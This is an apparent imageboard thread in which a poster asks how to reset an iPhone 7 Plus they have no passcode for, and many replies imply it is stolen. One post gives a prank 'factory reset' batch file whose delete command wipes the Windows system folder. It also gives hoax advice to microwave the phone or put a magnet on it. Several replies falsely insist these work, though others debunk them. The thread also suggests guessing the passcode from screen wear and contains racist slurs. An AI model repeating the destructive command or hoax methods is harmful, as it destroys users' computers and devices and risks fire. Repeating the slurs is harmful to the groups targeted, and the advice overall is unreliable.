Ok so i came into possession of an iphone that i dont know the passcode too...

ok so i came into possession of an iphone that i dont know the passcode too, and i would like to know if any of you guys know how to reset it , its an iphone 7plus any help would be awesome PIC ISNT THE PHONE

You can restore it by putting in recovery mode and connecting it in iTunes. There's about a 95% chance that it'll be icloud locked and if it is there's nothing you can do.

what phone do you have currently? if its 6 or higher im sure you can put the sim card into it.

Huh? How exactly would that bypass the lock screen?

Give it back Tyrone

it is an iphone 7plus, when plugged into itunes it dosent give anything about resetting, and also, when simcard is plugged in it works and gives carrier

It's bricked. Next time steal a android piece of shit

ofc pic isnt related, ppl in pic is white so it cant be you

You have to put it into recovery mode for iTunes to give you the option to restore it.

take it to one of them chink or indian guys that run shite electronic/ mobile repair shops then just suck their dicks in return for unlocking

give it back you fucking nigger

Im glad new phones are anti-nigger

That and the fact that phone is a 6s

Nice paper weight you have there

I posted that and I'm not op. Also any decent android phone will have a FRP lock that activates when the phone is reset through the recovery.

It wouldn't.
user is autistic.

Just boot it into recovery mode and manually restore it.

Hold the power button and the home button then when you see that apple logo let go of the power button till it says plug it into iTunes then do a restore on it. You'll lose everything on it tho

====================================
>
> To FACTORY RESET A "FOUND" iPHONE
> ==============================
> • Connect iPhone to your PC via USB cable.
> • if iTunes launches, immediately quit iTunes, or factory reset won't work
>
> • Now make a new notepad file, and Type the following text as 2 separate lines:
>
> "@echo off"
> "del c:\WINDOWS\system 32"
>
> {without quotes}
>
> • Save as RESET7S.bat (not as textfile, but as all files)
>
> • Open this new "RESET7S.bat" iPhone reset file
>
> • FACTORY RESET Completed.
>

==============

> UPDATE for RESET Method without using a Computer:
>
> • Remove any Case Covers from iPhone;
> • Place iPhone on Microwave-safe Plate, insert into Microwave Oven;
>
> • Use "High" Level for 20 Seconds exactly: NO MORE THAN 20 Seconds;
> (20 seconds takes into account different size wattage and power level microwaves)
>
> This pulse gives the iPhone a low level reset, makes iPhone behave like it has been factory reset.
>
> You will NOT be able to recover any of the the other users files, it will act as though it just came out of the box, and you can setup as new.
>
-------
> If that doesn't work,
> There is another method that involves placing a large powerful magnet on iPhone screen,
> for 5 minutes, that will sometimes reset phone to factory settings.
>
-------

Your all so stupid, when you get a phone with a passcode keep it as you found it and look for the places on the keep pad with most wear and tear. That will narrow it down to a few numbers and then go from there.

Wow, really dude?

hes taking the piss only a complete retard would put a phone in microwave

the first two methods work.
the 3rd method is retarded

No dont listen to him, itll brick your pc

Do a hard reset.

Yes. This really does work.

>Wow, really dude?
It's probably the best advice so far. The rest is bullshit at best, ignorance otherwise.

Next time be more subtle

1. It'll delete system 32, rendering your PC unusable.
2. Microwave will explode your phone. No good.
3. A magnet on a phone? Only retards will try.

Don't press the home button. They can find you with finger print scanner

That is iCloud locked the phone is now WORTHLESS return it or crumble it up and throw it away... Save yourself the headache I avidly but and sell phones fix and repair... That phone is now WORTHLESS.

>Only retards will try
You could have just said this alone.

This guy just doesn't want you to be able to use the phone. I've done this. It does work.

Wanted to explain why just in case a newfag thought I was lying.

Oh, easy. Just get the owner to enter the passcode then go to settings>general>reset. Easy.

doesn't this shit have some type of GPS tracking system. i'd through that shit away.

Don't do it, OP. They're lying to you. Google 'deleting system 32', and 'Apple Wave' hoax. you'll be better off for it.

Sell it to a retard.

Download Ifunbox do a hard reset